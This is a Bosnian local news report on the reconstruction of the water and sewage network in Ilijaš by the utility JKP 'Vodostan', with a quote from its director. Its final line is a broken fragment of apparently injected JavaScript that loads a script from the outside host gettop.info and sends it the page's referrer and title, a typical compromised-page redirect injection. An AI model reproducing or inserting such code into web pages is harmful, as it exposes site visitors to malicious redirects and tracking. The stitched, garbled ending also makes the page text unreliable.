Rekonstrukcija vodovodne mreže u ulici Ivana Franje Jukića

Danas su nastavljeni radovi u okviru projekta rekonstrukcije vodovodne i kanalizacione mreže u gradu Ilijašu, a u ovoj fazi radovi se izvode u ulici Ivana Franje Jukića. Implementator projekta je JKP ”Vodostan” Ilijaš.

Riječ je o kapitalnim investicijama, a projektom  je obuhvaćena rekonstrukcija vodovodne mreže u ulici Ivana Franje Jukića, zatim rekonstrukcija i proširenje vodovodne mreže u naselju Alića gaj, kao i dogradnja kišne i fekalne kanalizacije na istom mjestu.  Neki od benefita ovog i drugih projekata rekonstrukcije vodovodne mreže su smanjenje gubitaka na vodovodnoj mreži, zatim smanjenje kvarova i novih pucanja na vodovodnoj mreži, kao i umanjenje mogućnosti hidrauličnih pritisaka i u konačnici daje mogućnost da se sistemu vodosnabdijevanja kvalitetnije upravlja u ovim hidrološkim periodima koji su otežani, kazala je direktorica JKP Vodostan Ilijaš Belma Zukić.

Očekuje se da projekat rekonstrukcije vodovodne i kanalizacione mreže za proširenje gradskog vodovoda bude završen do kraja ove godine.

} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;